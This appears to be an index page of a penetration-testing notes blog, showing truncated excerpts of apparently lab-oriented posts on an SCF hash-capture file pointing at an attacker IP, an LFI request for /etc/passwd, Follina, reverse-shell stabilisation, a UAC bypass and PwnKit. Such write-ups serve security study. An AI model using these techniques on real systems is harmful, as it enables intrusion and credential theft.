SCF Attack SCF Attack First we need to write a file inside the share with writting permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...

Simple LFI If an input is accepted on a URL parameter we can try to access any system file and check if whether or not it retrieves the file: http://10.11.1.35/section.php?page=/etc/passwd http://1...

Redirect traffic to TCP localhost port We can redirect the websocket traffic to a TCP localhost port so we can interact with it as if it were an HTTP port: from http.server import SimpleHTTPRequest...

Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...

The following exploit Follina works pretty well, all you need to do is clone the repository and execute it as follows, the “-c” is the command to execute, it can be a cmd or a powershell intruction...

Python Once we get access to the victim machine we proceed to stabilize the shell: First we need to Ctrl + Z the shell as follows: tom@epsilon:/var/www/app$ ^Z zsh: suspended nc -lvnp 1235 Then t...

Read a file Create a file test.js with content: const fs = require('fs'); fs.readFile('/root/root.txt', 'utf-8', (err, data) =>{ if (err) throw err; console.log(data); }); To e...

Authentication method gssapi-with-mic (krb5.conf file) If we receive the following message while trying to authenticate with any service: debug1: SSH2_MSG_EXT_INFO received debug1: kex_input_ext_in...

UAC can be bypassed in various ways. This post is only a technique that allows an administrator user to bypass UAC by silently elevating our integrity level from medium to high. Most of the public...

PwnKit (ly4k) This PwnKit contains a pretty good PwnKit binary for PKEXEC. In order to exploit it, we need to download the PwnKit.c binary and compile from our Kali: (This is to compile with x32 ...